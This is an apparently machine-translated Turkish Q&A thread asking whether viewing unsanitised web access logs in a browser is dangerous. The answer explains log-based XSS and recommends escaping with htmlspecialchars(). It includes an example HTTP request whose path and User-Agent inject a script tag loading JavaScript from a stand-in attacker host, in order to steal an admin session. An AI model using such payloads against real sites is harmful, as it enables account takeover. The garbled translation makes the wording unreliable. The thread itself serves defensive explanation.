Bu web tarayıcısı üzerinden hijyen olmadan erişim günlüğünü görüntülemek için tehlikeli bir şey mi?

2 Cevap php

Bu web tarayıcısı üzerinden hijyen olmadan erişim günlüğünü görüntülemek için tehlikeli bir şey mi?

Ben erişim günlüğünü kaydetmek için düşünüyor yaşıyorum, ve ben wev tarayıcısı üzerinden görüntülemek için düşünüyorum, ama saldırganın uzak ana veya kullanıcı ajan falan değiştirir eğer, bana saldırabilir?

Onun uzak ana veya kullanıcı ajan veya EKT içine kod saldıran takarak.

Yani bir web tarayıcısı üzerinden erişim günlük dosyasını açmadan önce htmlspecialchar ile dezenfekte etmek gerekiyor?

Ben saldırganın uzaktaki ana yada ajan veya someware bazı hücum kodu eklemek demek, o zaman ben o zaman benim PC o kodu etkilenecek, web tarayıcısı üzerinden bu erişim günlüğüne bakın.

2 Cevap

Evet, bu tehlikelidir.

Örneğin, kötü niyetli bir kullanıcı sadece böyle bir şey talep edebilir:

GET /<script src="http://www.evilsite.com/malicious.js"></script> HTTP/1.1
Host: www.example.com
Connection: close
User-Agent: <script src="http://www.evilsite.com/malicious.js"></script>

Ve kötü niyetli JavaScript ile görünüm sayfasını uzlaşma.

Muhtemelen sitenizde günlüğünü görüntüleme konum beri, yönetici haklarına sahip bir hesap olarak oturum olurdu. Kötü niyetli JavaScript ile, saldırganın oturum tanımlama çalabilir ve içeri giriş sırasında yapabileceğiniz tüm şeyler ile tam oturumu devralmak

Eğer idari hesapları tehlikeye sahip Seviyorum sürece Yani, sonuç olarak, size definitely, erişim günlük sayfaları kaçmak gerekir.

Teorik olarak evet, mümkündür, ve bu konuda bu şekilde düşünmek doğru zihniyet sahip için kendinizi takdir edilmelidir. Bir web tarayıcısında görüntülemeden önce herhangi bir kontrolsüz giriş dezenfektan her zaman iyi bir fikirdir.

I htmlspecialchars() ile günlük çıkış çalışır.

etiketler